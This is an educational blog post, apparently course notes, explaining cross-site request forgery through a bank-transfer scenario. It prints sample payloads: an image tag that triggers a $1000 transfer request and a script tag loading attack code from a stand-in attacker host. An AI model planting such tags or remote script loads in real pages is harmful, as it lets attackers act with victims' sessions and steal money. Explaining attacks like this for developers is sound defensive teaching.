Cross-site Request Forgery (CSRF)

Posted on October 21, 2012. Filed under: SANS Dev 541 |


Cross-site request forgery attack exploits the trust the website has in its users.

A malicious code is embedded on a malicious website, when user happens to visit that malicious website, a GET or POST request is sent it to victim website in behave of that user. If the user has a valid session on that victim website, the attacker can perform malicious actions as a valid user.

Let’s take an example.

  1. step one.  the victim visits his bank website and logins his account.
  2. step two. the same user browses a bulletin board website while still has valid session in bank website.
  3. step three. there is an image tag at the bulletin board website, the location is not point to a real image, but point to the bank website. When the image tag is rendered, the request is sent to the bank website requesting $1000 transfer from victim’s bank account to attacker’s bank account.
<img src="http://goodbank.com/transfer.jsp?receiver=badguy&amount=1000"></img>

The attacker can go one step further and embed a script tag in bulletin board website, which calls malicious code from attacker’s website to perform more sophisticated attacks.

<script src="http://attacker_code_store/attack_bank.js"></script>

In the attack_bank.js,

alert('I can do anything here!');

parseResponse();

modifyHTTPHeaders();

addRecipient();

transferMoney();

function parseResponse() {

...

hacker can use ajax XMLHTTPRequests object to programmatically send a series of HTTP post requests to perform actions such as parse response, modify HTTP headers, add recipient, transfer money etc. At the mean time, the bank site is thinking that a valid user is browsing the website and performing some valid transactions.

The following video is another example, where the malicious code is embedded in an iframe which is invisible to the victim.

Advertisements

Make a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Liked it here?
Why not try sites on the blogroll...

%d bloggers like this: